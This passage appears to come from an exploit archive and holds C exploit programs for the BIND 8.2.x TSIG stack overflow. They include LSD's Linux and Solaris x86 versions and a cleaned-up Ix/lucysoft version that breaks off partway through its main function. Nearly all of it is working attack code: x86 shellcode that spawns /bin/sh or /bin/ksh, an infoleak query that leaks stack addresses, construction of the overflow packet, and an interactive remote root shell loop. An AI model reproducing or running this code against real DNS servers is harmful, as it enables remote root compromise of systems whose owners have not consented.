/* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */
/* is spawned. */
/* */
/* The use of such an assembly routine allows successfull exploitation of */
/* the vulnerability in the case when vulnerable dns servers are protected */
/* by tightly configured firewall systems (with only 53 tcp/udp port open). */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
char asmcode[]=
"\x3f" /* label len 63 */
"\x90\x90\x90" /* padding */
"\xeb\x3b" /* jmp <asmcode+65> */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x5f" /* popl %edi */
"\x83\xef\x7c" /* sub $0x7c,%edi */
"\x8d\x77\x10" /* leal 0x10(%edi),%esi */
"\x89\x77\x04" /* movl %esi,0x4(%edi) */
"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
"\xb3\x10" /* movb $0x10,%bl */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x89\x0f" /* movl %ecx,(%edi) */
"\x51" /* pushl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x07" /* movb $0x7,%bl */
"\x89\xf9" /* movl %edi,%ecx */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x39\xd8" /* cmpl %ebx,%eax */
"\x75\x0a" /* jne <asmcode+62> */
"\x66\xbb\x12\x34" /* movw $0x1234,%bx */
"\x66\x39\x5e\x02" /* cmpw %bx,0x2(%esi) */
"\x74\x08" /* je <asmcode+70> */
"\xe2\xe0" /* loop <asmcode+32> */
"\x3f" /* label len 63 */
"\xe8\xc0\xff\xff\xff" /* call <asmcode+6> */
"\x89\xcb" /* movl %ecx,%ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x03" /* movb $0x03,%cl */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x3f" /* movb $0x3f,%al */
"\x49" /* decl %ecx */
"\xcd\x80" /* int $0x80 */
"\x41" /* incl %ecx */
"\xe2\xf6" /* loop <asmcode+76> */
"\xeb\x14" /* jmp <asmcode+108> */
"\x31\xc0" /* xorl %eax,%eax */
"\x5b" /* popl %ebx */
"\x8d\x4b\x14" /* leal 0x14(%ebx),%ecx */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x89\x43\x18" /* movl %eax,0x18(%ebx) */
"\x88\x43\x07" /* movb %al,0x7(%ebx) */
"\x31\xd2" /* xorl %edx,%edx */
"\xb0\x0b" /* movb $0xb,%al */
"\xcd\x80" /* int $0x80 */
"\xe8\xe7\xff\xff\xff" /* call <asmcode+88> */
"/bin/sh"
"\x90\x90\x90\x90" /* padding */
"\x90\x90\x90\x90"
;
int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86\n\n");
if(argc<2){
printf("usage: %s address [-s][-e]\n",argv[0]);
printf(" -s send infoleak packet\n");
printf(" -e send exploit packet\n");
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
asmcode[4+48+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:\n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]);
}
printf("\n\n");
fp=rev(*(unsigned int*)&buffer[532]);
ofs=0xfe-((fp-(fp&0xffffff00))&0xff);
cnt=163;
if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
printf("system does not seem to be a vulnerable linux\n");exit(1);
}
if(flag==1){
printf("system seems to be running bind 8.2.x on a linux\n");exit(-1);
}
if(cnt<(ofs+28)){
printf("frame ptr is too low to be successfully exploited\n");exit(-1);
}
jmp=rev(fp-586);
ptr6=rev((fp&0xffffff00)-12);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
b=buffer;
memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;
for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i];
for(i=0;i<(128>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=28;
memcpy(b,"\x06\x00\x00\x00",4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,"\x06\x00\x00\x00",4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+28;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!\n");
write(sck[1],"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
err:
perror("error");exit(-1);
}
// [2001-03-01]
53 BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (3)
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Solaris 2.7 x86 #*/
/* The code establishes a TCP connection with port 53 of a target system. */
/* It makes use of the "infoleek" bug (through UDP) to obtain the base */
/* value of the named process frame stack pointer, which is later used */
/* for constructing proper DNS tsig exploit packet. */
/* */
/* Upon successful exploitation the assembly routine gets executed. It */
/* walks the descriptor table of the exploited named process in a search */
/* for the socket descriptor of the previously established TCP connection. */
/* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */
/* is spawned. */
/* */
/* The use of such an assembly routine allows successfull exploitation of */
/* the vulnerability in the case when vulnerable dns servers are protected */
/* by tightly configured firewall systems (with only 53 tcp/udp port open). */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
char asmcode[]=
"\x1b" /* label len 1+26 */
"\x90" /* padding */
"\x33\xc0" /* xorl %eax,%eax */
"\xeb\x09" /* jmp <syscallcode+13> */
"\x5f" /* popl %edi */
"\x57" /* pushl %edi */
"\x47" /* incl %edi */
"\xab" /* stosl %eax,%es:(%edi) */
"\x47" /* incl %edi */
"\xaa" /* stosb %al,%es:(%edi) */
"\x5e" /* popl %esi */
"\xeb\x0e" /* jmp <syscallcode+26+1> */
"\xe8\xf2\xff\xff\xff" /* call <syscallcode+4> */
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3" /* ret */
"\x33" /* label len 51 */
"\x56" /* pushl %esi */
"\x5f" /* popl %edi */
"\x83\xef\x7c" /* subl $0x7c,%edi */
"\x57" /* pushl %edi */
"\x8d\x4f\x10" /* leal 0x10(%edi),%ecx */
"\xb0\x44" /* movb $0x44,%al */
"\xab" /* stosl %eax,%es:(%edi) */
"\xab" /* stosl %eax,%es:(%edi) */
"\x91" /* xchgl %ecx,%eax */
"\xab" /* stosl %eax,%es:(%edi) */
"\x95" /* xchgl %eax,%ebp */
"\x66\xb9\x91\x54" /* movw $0x5491,%cx */
"\x51" /* pushl %ecx */
"\x66\xb9\x01\x01" /* movw $0x0101,%cx */
"\x51" /* pushl %ecx */
"\x33\xc0" /* xorl %eax,%eax */
"\xb0\x36" /* movb $0x36,%al */
"\xff\xd6" /* call *%esi */
"\x59" /* popl %ecx */
"\x33\xdb" /* xorl %ebx,%ebx */
"\x3b\xc3" /* cmpl %ebx,%eax */
"\x75\x0a" /* jne <findsckcode+49> */
"\x66\xbb\x12\x34" /* movw $0x1234,%bx */
"\x66\x39\x5d\x02" /* cmpw %bx,0x2(%ebp) */
"\x74\x03" /* je <findsckcode+51+1> */
"\xe2\xe6" /* loop <findsckcode+25> */
"\x37" /* label len 21+34 */
"\xb0\x09" /* movb $0x09,%al */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x91" /* xchgl %ecx,%eax */
"\xb1\x03" /* movb $0x03,%cl */
"\x49" /* decl %ecx */
"\x89\x4c\x24\x08" /* movl %ecx,0x8(%esp) */
"\x41" /* incl %ecx */
"\x33\xc0" /* xorl %eax,%eax */
"\xb0\x3e" /* movb $0x3e,%al */
"\xff\xd6" /* call *%esi */
"\xe2\xf2" /* loop <findsckcode+58+1> */
"\xeb\x13" /* jmp <shellcode+21> */
"\x33\xd2" /* xorl %edx,%edx */
"\x58" /* popl %eax */
"\x8d\x78\x14" /* leal 0x14(%eax),edi */
"\x52" /* pushl %edx */
"\x57" /* pushl %edi */
"\x50" /* pushl %eax */
"\xab" /* stosl %eax,%es:(%edi) */
"\x92" /* xchgl %eax,%edx */
"\xab" /* stosl %eax,%es:(%edi) */
"\x88\x42\x08" /* movb %al,0x8(%edx) */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
"\xe8\xe8\xff\xff\xff" /* call <shellcode+2> */
"/bin/ksh"
;
int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for solaris 2.7 x86\n\n");
if(argc<2){
printf("usage: %s address [-s][-e]\n",argv[0]);
printf(" -s send infoleek packet\n");
printf(" -e send exploit packet\n");
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
asmcode[1+1+26+1+39+2]=(unsigned char)((n>>8)&0xff);
asmcode[1+1+26+1+39+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:\n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]);
}
printf("\n\n");
fp=rev(*(unsigned int*)&buffer[532]);
ofs=0x0106-((fp-(fp&0xffffff00))&0xff);
cnt=163;
if((buffer[512+20+2]!=(char)0x04)&&(buffer[512+20+3]!=(char)0x08)){
printf("system does not seem to be a vulnerable solaris\n");exit(1);
}
if(flag==1){
printf("system seems to be running bind 8.2.x on a solaris\n");exit(-1);
}
if(cnt<(ofs+12)){
printf("frame ptr is too low to be successfully exploited\n");exit(-1);
}
jmp=rev(fp-583);
ptr6=rev((fp&0xffffff00)+8);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
b=buffer;
memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;
for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i];
for(i=0;i<(120>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=12;
memcpy(b,&jmp,4);b+=4;
memcpy(b,"\x06\x00\x00\x00",4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+12;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!\n");
write(sck[1],"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
err:
perror("error");exit(-1);
}
// [2001-03-01]
53 BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (4)
/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg <[email protected]>
* Jonathan Wilkins <[email protected]>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [[email protected]] (the master of jmpz),
* lucysoft [[email protected]] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez - canaris
* greetz - blizzard, netman.
* creditz - anathema <[email protected]> for the original shellcode
* - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#define max(a,b) ((a)>(b)?(a):(b))
#define BUFFSIZE 4096
int argevdisp1, argevdisp2;
char shellcode[] =
/* The numbers at the right indicate the number of bytes the call takes
* and the number of bytes used so far. This needs to be lower than
* 62 in order to fit in a single Query Record. 2 are used in total to
* send the shell code
*/
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
spot first */
"\xeb\x44" /* jmp intr */ // 2 - 2
/* start: */
"\x5e" /* popl %esi */ // 1 - 3
/* socket() */
"\x29\xc0" /* subl %eax, %eax */ // 2 - 5
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */ // 3 - 8
"\x40" /* incl %eax */ // 1 - 9
"\x89\xc3" /* movl %eax, %ebx */ // 2 - 11
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ // 3 - 14
"\x40" /* incl %eax */ // 1 - 15
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */ // 3 - 18
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 21
"\xb0\x66" /* movb $0x66, %al */ // 2 - 23
"\xcd\x80" /* int $0x80 */ // 2 - 25
/* bind() */
"\x43" /* incl %ebx */ // 1 - 26
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ // 4 - 30
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ // 4 - 34
"\x88\x46\x08" /* movb %al, 0x08(%esi) */ // 3 - 37
"\x29\xc0" /* subl %eax, %eax */ // 2 - 39
"\x89\xc2" /* movl %eax, %edx */ // 2 - 41
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"\xb0\x90" /* movb $0x90, %al */ // 2 - 46
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ // 4 - 50
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ // 3 - 53
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ // 3 - 56
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 59
"\xeb\x02" /* jmp cont */ // 2 - 2
/* intr: */
"\xeb\x43" /* jmp callz */ // 2 - 4
/* cont: */
"\xb0\x66" /* movb $0x66, %al */ // 2 - 6
"\xcd\x80" /* int $0x80 */ // 2 - 10
/* listen() */
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ // 3 - 11
"\x43" /* incl %ebx */ // 1 - 12
"\x43" /* incl %ebx */ // 1 - 13
"\xb0\x66" /* movb $0x66, %al */ // 2 - 15
"\xcd\x80" /* int $0x80 */ // 2 - 17
/* accept() */
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ // 3 - 20
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */ // 3 - 23
"\xb0\x66" /* movb $0x66, %al */ // 2 - 25
"\x43" /* incl %ebx */ // 1 - 26
"\xcd\x80" /* int $0x80 */ // 1 - 27
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3" /* xchgb %al, %bl */ // 2 - 29
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 31
"\x29\xc9" /* subl %ecx, %ecx */ // 2 - 33
"\xcd\x80" /* int $0x80 */ // 2 - 35
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 37
"\x41" /* incl %ecx */ // 1 - 38
"\xcd\x80" /* int $0x80 */ // 2 - 40
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 42
"\x41" /* incl %ecx */ // 1 - 43
"\xcd\x80" /* int $0x80 */ // 2 - 45
/* execve() */
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */ // 3 - 48
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ // 3 - 51
"\x87\xf3" /* xchgl %esi, %ebx */ // 2 - 53
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ // 3 - 56
"\xb0\x0b" /* movb $0x0b, %al */ // 2 - 58
"\xcd\x80" /* int $0x80 */ // 2 - 60
"\x90"
/* callz: */
"\xe8\x72\xff\xff\xff" /* call start */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */ // 8 - 13
unsigned long resolve_host(char* host)
{
long res;
struct hostent* he;
if (0 > (res = inet_addr(host)))
{
if (!(he = gethostbyname(host)))
return(0);
res = *(unsigned long*)he->h_addr;
}
return(res);
}
int dumpbuf(char *buff, int len)
{
char line[17];
int x;
/* print out a pretty hex dump */
for(x=0;x<len;x++){
if(!(x%16) && x){
line[16] = 0;
printf("\t%s\n", line);
}
printf("%02X ", (unsigned char)buff[x]);
if(isprint((unsigned char)buff[x]))
line[x%16]=buff[x];
else
line[x%16]='.';
}
printf("\n");
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "uname -a; id;\n", 15, 0);
for(;;)
{
FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);
if(select(fmax, &fds, NULL, NULL, NULL) < 0)
{
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{
bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
{
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
if(send(sockd, buff, ret, 0) != ret)
{
fprintf(stderr, "Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
}
connection(struct sockaddr_in host)
{
int sockd;
host.sin_port = htons(36864);
printf(" connecting..\n");
usleep(2000);
if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
exit(EXIT_FAILURE);
}
if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1)
{
printf(" wait for your shell..\n");
usleep(500);
runshell(sockd);
}
else
{
printf("[x] error: named not vulnerable or wrong offsets used\n");
}
close(sockd);
}
int infoleak_qry(char* buff)
{
HEADER* hdr;
int n, k;
char* ptr;
int qry_space = 12;
int dummy_names = 7;
int evil_size = 0xff;
memset(buff, 0, BUFFSIZE);
hdr = (HEADER*)buff;
hdr->id = htons(0xbeef);
hdr->opcode = IQUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(0);
hdr->nscount = htons(0);
hdr->ancount = htons(1);
hdr->arcount = htons(0);
ptr = buff + sizeof(HEADER);
printf("[d] HEADER is %d long\n", sizeof(HEADER));
n = 62;
for(k=0; k < dummy_names; k++)
{
*ptr++ = n;
ptr += n;
}
ptr += 1;
PUTSHORT(1/*ns_t_a*/, ptr); /* type */
PUTSHORT(T_A, ptr); /* class */
PUTLONG(1, ptr); /* ttl */
PUTSHORT(evil_size, ptr); /* our *evil* size */
return(ptr - buff + qry_space);
}
int evil_query(char* buff, int offset)
{
int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offset0;
HEADER* hdr;
char *ptr;
int k, bufflen;
u_int n, m;
u_short s;
int i;
int shelloff, shellstarted, shelldone;
int towrite, ourpack;
int n_dummy_rrs = 7;
printf("[d] evil_query(buff, %08x)\n", offset);
printf("[d] shellcode is %d long\n", sizeof(shellcode));
shelladdr = offset - 0x200;
lameaddr = shelladdr + 0x300;
ourpack = offset - 0x250 + 2;
towrite = (offset & ~0xff) - ourpack - 6;
printf("[d] olb = %d\n", (unsigned char) (offset & 0xff));
rroffsetidx = towrite / 70;
offset0 = towrite - rroffsetidx * 70;
if ((offset0 > 52) || (rroffsetidx > 6))
{
printf("[x] could not write our data in buffer (offset0=%d, rroffsetidx=%d)\n", offset0, rroffsetidx);
return(-1);
}
rrshellidx = 1;
deplshellcode = 2;
hdr = (HEADER*)buff;
memset(buff, 0, BUFFSIZE);
/* complete the header */
hdr->id = htons(0xdead);
hdr->opcode = QUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(n_dummy_rrs);
hdr->ancount = htons(0);
hdr->arcount = htons(1);
ptr = buff + sizeof(HEADER);
shellstarted = 0;
shelldone = 0;
shelloff = 0;
n = 63;
for (k = 0; k < n_dummy_rrs; k++)
{
*ptr++ = (char)n;
for(i = 0; i < n-2; i++)
{
if((k == rrshellidx) && (i == deplshellcode) && !shellstarted)
{
printf(" injecting shellcode at %d\n", k);
shellstarted = 1;
}
if ((k == rroffsetidx) && (i == offset0))
{
*ptr++ = lameaddr & 0x000000ff;
*ptr++ = (lameaddr & 0x0000ff00) >> 8;
*ptr++ = (lameaddr & 0x00ff0000) >> 16;
*ptr++ = (lameaddr & 0xff000000) >> 24;
*ptr++ = shelladdr & 0x000000ff;
*ptr++ = (shelladdr & 0x0000ff00) >> 8;
*ptr++ = (shelladdr & 0x00ff0000) >> 16;
*ptr++ = (shelladdr & 0xff000000) >> 24;
*ptr++ = argevdisp1 & 0x000000ff;
*ptr++ = (argevdisp1 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp1 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp1 & 0xff000000) >> 24;
*ptr++ = argevdisp2 & 0x000000ff;
*ptr++ = (argevdisp2 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp2 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp2 & 0xff000000) >> 24;
i += 15;
}
else
{
if (shellstarted && !shelldone)
{
*ptr++ = shellcode[shelloff++];
if(shelloff == (sizeof(shellcode)))
shelldone=1;
}
else
{
*ptr++ = i;
}
}
}
/* OK: this next set of bytes constitutes the end of the
* NAME field, the QTYPE field, and the QCLASS field.
* We have to have the shellcode skip over these bytes,
* as well as the leading 0x3f (63) byte for the next
* NAME field. We do that by putting a jmp instruction
* here.
*/
*ptr++ = 0xeb;
if (k == 0)
{
*ptr++ = 10;
/* For alignment reasons, we need to stick an extra
* NAME segment in here, of length 3 (2 + header).
*/
m = 2;
*ptr++ = (char)m; // header
ptr += 2;
}
else
{
*ptr++ = 0x07;
}
/* End the NAME with a compressed pointer. Note that it's
* not clear that the value used, C0 00, is legal (it
* points to the beginning of the packet), but BIND apparently
* treats such things as name terminators, anyway.
*/
*ptr++ = 0xc0; /*NS_CMPRSFLGS*/
*ptr++ = 0x00; /*NS_CMPRSFLGS*/
ptr += 4; /* QTYPE, QCLASS */
}
/* Now we make the TSIG AR */
*ptr++ = 0x00; /* Empty name */
PUTSHORT(0xfa, ptr); /* Type TSIG */
PUTSHORT(0xff, ptr); /* Class ANY */
bufflen = ptr - buff;
// dumpbuf(buff, bufflen);
return(bufflen);
}
long xtract_offset(char* buff, int len)
{
long ret;
/* Here be dragons. */
/* (But seriously, the values here depend on compilation options
* used for BIND.
*/
ret = *((long*)&buff[0x214]);
argevdisp1 = 0x080d7cd0;
argevdisp2 = *((long*)&buff[0x264]);
printf("[d] argevdisp1 = %08x, argevdisp2 = %08x\n",
argevdisp1, argevdisp2);
// dumpbuf(buff, len);
return(ret);
}
int main(int argc, char* argv[])
{
struct sockaddr_in sa;
int sock;
long address;
char buff[BUFFSIZE];
int len, i;
long offset;
socklen_t reclen;
unsigned char foo[4];
printf(" named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix\n");
printf(" fixed by [email protected] and [email protected]\n\n");
address = 0;
if (argc < 2)
{
printf(" usage : %s host\n", argv[0]);
return(-1);
}
if (!(address = resolve_host(argv[1])))
{
printf("[x] unable to resolve %s, try using an IP address\n", argv[1]);
return(-1);
} else {
memcpy(foo, &address, 4);
printf(" attacking %s (%d.%d.%d.%d)\n", argv[1], foo[0], foo[1], foo[2], foo[3]);
}
sa.sin_family = AF_INET;
if (0 > (sock = socket(sa.sin_family, SOCK_DGRAM, 0)))
{
return(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
sa.sin_addr.s_addr= address;
len = infoleak_qry(buff);
printf("[d] infoleak_qry was %d long\n", len);
len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (len < 0)
{
printf(" unable to send iquery\n");
return(-1);
